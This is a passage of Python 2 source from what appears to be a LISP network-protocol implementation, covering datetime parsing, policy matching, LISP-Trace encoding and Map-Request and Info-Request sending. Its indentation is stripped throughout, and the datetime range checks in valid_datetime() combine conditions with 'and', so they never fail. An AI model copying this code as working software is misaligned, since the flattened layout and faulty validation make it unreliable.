def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
            s.bind((device, 0))
            self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
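#
# Illustrative example of lisp_datetime() usage (format derived from
# valid_datetime() above, "YYYY-MM-DD-HH:MM:SS"):
#
#   dt = lisp_datetime("2015-12-31-23:59:59")
#   dt.future()                # True if timestamp is later than now
#   lower.now_in_range(upper)  # True if now is between 'lower' and 'upper'
#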
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
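#
# Illustrative example (not from a config file): a lisp_policy() with one
# lisp_policy_match() whose source_eid is 10.0.0.0/8 matches a Map-Request
# with source-EID 10.1.1.1, since matching uses is_more_specific(). If
# set_rloc_record_name is configured, set_policy_map_reply() returns a
# lisp_rloc() with that rloc-name filled in; it returns None when none of
# the RLOC-related set-clauses are configured.
#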
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
        #endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
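#
# Illustrative sketch of lisp_trace() usage (assumes the helper functions in
# this file are loaded):
#
#   trace = lisp_trace()
#   trace.packet_json = [{"node": "ITR", "srloc": "10.0.0.1"}]
#   packet = trace.encode()          # Type=9 header + nonce + JSON
#   ok = lisp_trace().decode(packet) # True, nonce and JSON recovered
#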
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
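#
# Illustrative usage of lisp_get_map_resolver(): pass (address, *) to find
# the MR with that address, (None, "") to get any (the first) MR, and
# (None, eid) to get the least recently used MR whose mr-name matches the
# database-mapping for 'eid' (or "all" when none is configured).
#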
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
    # Check for an IGMP packet first. Don't verify the IP checksum and don't
    # test TTL for IGMP.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
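#
# Usage sketch (illustrative): callers interpret the returned array as
# [igmp-flag, packet]:
#
#   flag, packet = lisp_ipv4_input(packet)
#   if (flag): ...             # IGMP packet, pass through unmodified
#   if (packet == None): ...   # drop, bad checksum or TTL 0/1
#   ...                        # else TTL decremented, checksum updated
#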
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
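#
# For example (illustrative value), if LISP_MAP_REQUEST_RATE_LIMIT were 5
# seconds, a data-triggered Map-Request arriving 2 seconds after the last
# one sent would return True here and be suppressed by the caller.
#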
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
    # Set RLOC-probe parameters if the caller wants the Map-Request to be an
    # RLOC-probe. We use probe_port 4341 so that the ITR and RTR keying data
    # structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
    # Hold the request nonce so we can match replies from xTRs that have
    # multiple RLOCs. The reason is that the reply's source address may not be
    # the probed destination. And in our ETR implementation, we can get the
    # probe-request destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
    # We do this on the ETR only so the lisp-itr and lisp-etr processes don't
    # both add and delete host routes (for Info-Request sending purposes) at
    # the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
        # If we found a host route for the map-server, then both the lisp-itr
        # and lisp-etr processes are in this routine at the same time.
        # Wait for the host route to go away before proceeding. We will use
        # the map-server host route as an IPC lock. For the data port, only
        # the lisp-etr process will add a host route to the RTR for Info-
        # Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
    # Send packet to the control port via the control-sockets interface. For
    # data port 4341, do the same via the lisp-core process but prepend a
    # LISP data header to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
